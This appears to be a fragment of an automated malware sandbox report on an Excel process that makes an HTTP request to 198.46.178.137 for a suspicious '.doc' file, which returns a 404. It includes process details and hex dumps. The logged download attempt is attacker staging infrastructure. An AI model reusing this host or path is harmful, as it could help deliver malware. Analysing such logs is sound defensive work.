Access-Control-Allow-Origin: *
Content-Length: 215
Keep-Alive: timeout=5, max=75
Content-Type: text/html; charset=UTF-8
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 9d 91 3d 0f 82 30 10 86 77 7f 45 ed e2 64 2b d1 08 6a 61 f1 63 d5 18 1c 1c 2b 9c 94 84 2f eb 69 f4 df 5b a8 84 84 91 de 25 6d 93 bb 7b df 27 27 c6 bb e3 36 bc 9e f6 44 61 9e 05 23 61 2f 62 8e 50 20 63 fb 6c be 39 a0 24 91 92 fa 09 e8 d3 4b 78 98 7a 94 f0 7e 81 42 ac a6 f0 78 a5 6f 9f 6a b8 6b 78 2a 4a a2 b2 40 28 4c d7 6c f3 d2 99 3f a9 8b d6 9c 3b 2b 8f 2d 96 cc 71 3d e6 cc 5d fe 91 79 55 71 9d 98 64 6d b6 c1 e2 32 9a 34 72 9d 1e a6 98 41 70 86 38 d5 10 61 5a 24 04 4b 32 6c b4 e0 76 98 05 e7 1d b9 b8 95 f1 b7 63 ec 89 09 c3 6b 20 7d 3a 4c 95 06 43 dd ca 80 fd ad 5a 7f c6 72 bd b7 1f d8 20 06 3f ce 01 00 00
Data Ascii: =0wEd+jac+/i[%m{''6Da#a/bP cl9$Kxz~Bxojkx*J@(Ll?;+-q=]yUqdm24rAp8aZ$K2lvck }:LCZr ?


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
3192.168.2.2249164198.46.178.137801548C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampBytes transferredDirectionData
Jul 5, 2024 07:13:35.411452055 CEST353OUTGET /xampp/rg/rg.rg.rg.rgrgrgrgrg.doc HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.46.178.137
Connection: Keep-Alive
Jul 5, 2024 07:13:35.891732931 CEST541INHTTP/1.1 404 Not Found
Date: Fri, 05 Jul 2024 05:13:35 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Content-Length: 300
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 34 36 2e 31 37 38 2e 31 33 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.46.178.137 Port 80</address></body></html>


Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Target ID:0
Start time:01:12:56
Start date:05/07/2024
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:0x13fea0000
File size:28'253'536 bytes
MD5 hash:D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

No disassembly